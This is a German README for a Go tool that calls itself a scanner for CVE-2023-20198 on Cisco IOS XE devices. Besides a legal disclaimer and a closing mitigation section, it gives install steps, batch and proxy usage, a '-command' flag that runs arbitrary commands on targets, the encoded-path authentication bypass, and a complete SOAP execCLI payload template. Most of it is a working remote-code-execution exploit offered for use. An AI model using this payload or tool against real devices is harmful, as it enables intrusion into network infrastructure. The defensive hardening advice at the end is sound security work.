
Go-basierter Schwachstellenscanner zur Erkennung von CVE-2023-20198 in Cisco IOS XE-Geräten. Testet SOAP/XML-Schnittstellen (WSMA) auf Remote-Code-Ausführung mit Batch-Scanning und HTML-Berichterstellung.
Ein professioneller Vulnerability-Scanner zur Erkennung von CVE-2023-20198 auf Cisco IOS XE-Geräten. Testet auf anfällige SOAP/XML-Schnittstellen (WSMA). Entwickelt für autorisierte Sicherheitsbewertungen und Netzwerkaudits.
NUR FÜR AUTORISIERTE SICHERHEITSTESTS
Dieses Tool ist ausschließlich bestimmt für:
Unbefugter Zugriff auf Computersysteme ist ILLEGAL. Stellen Sie immer sicher, dass Sie die entsprechende Autorisierung haben, bevor Sie Systeme testen.
go install (empfohlen)go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest
Die Binärdatei wird in Ihr $GOPATH/bin-Verzeichnis installiert (normalerweise ~/go/bin).
# Repository klonen
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker
# Bauen
go build -o cisco-cve-2023-20198-checker
# Installieren (optional)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/
# Einzelnes Ziel prüfen
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# Mehrere Ziele prüfen
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin
# HTML-Bericht generieren
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html
Perfekt für Unternehmensumgebungen! Unterstützt:
# HTTP-Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 (SSH-Tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# Umgebungsvariable
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin
Siehe PROXY_GUIDE.md für eine detaillierte Proxy-Konfiguration.
| Flag | Typ | Standard | Beschreibung |
|---|---|---|---|
-target | string | - | Einzelnes Ziel-IP/Rechnername |
-targets-file | string | - | Datei mit Zielen (eines pro Zeile) |
-port | int | 443 | HTTPS/SOAP-Port |
-username | string | admin | SOAP-Benutzername |
-password | string | - | Erforderlich. SOAP-Passwort |
-command | string | uname -a | Auszuführender Befehl |
-html | bool | false | HTML-Bericht generieren |
-timeout | int | 10 | Request-Timeout (Sekunden) |
-skip-verify | bool | true | SSL-Überprüfung überspringen |
-proxy | string | - | Proxy-URL (http://, https://, socks5://) |
# Grundlegende Schwachstellenprüfung
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# Benutzerdefinierter Port
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret
# Bestimmten Befehl ausführen
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# Bericht generieren
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html
# Zieldatei erstellen
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF
# Alle Ziele testen
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123
# Batch mit HTML-Bericht
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html
# Netzwerkerkundung
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show ip interface brief"
# Versionserkennung
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# Über HTTP-Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# Über SOCKS5-Proxy (SSH-Tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# Authentifizierter Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://user:[email protected]:8080
CVE-ID: CVE-2023-20198
CVSS-Score: 10.0 (Kritisch)
Typ: Remote Code Execution (RCE)
Betroffen: Cisco IOS XE Web UI (WSMA)
/%2577ebui_wsma_https (Pfadcodierungs-Bypass)urn:cisco:wsma-exec<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password>password</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body>
<request xmlns="urn:cisco:wsma-exec">
<execCLI>
<cmd>COMMAND_HERE</cmd>
</execCLI>
</request>
</SOAP:Body>
</SOAP:Envelope>
Wenn Ihre Geräte angreifbar sind:
1. WSMA deaktivieren (falls nicht benötigt)
no ip http server
no ip http secure-server
2. Zugriff mit ACLs einschränken
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
permit 10.0.0.0 0.0.0.255
deny any log
3. Firmware aktualisieren – Aktuelle Cisco-Sicherheitspatches einspielen
4. Starke Authentifizierung aktivieren
aaa new-model
aaa authentication login default group tacacs+ local
5. Protokolle überwachen – Auf verdächtige SOAP/HTTP-Aktivitäten achten
# Standard-Build
go build -o cisco-cve-2023-20198-checker
# Optimiert (kleinere Binärdatei)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker
# Für verschiedene Plattformen cross-kompilieren
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1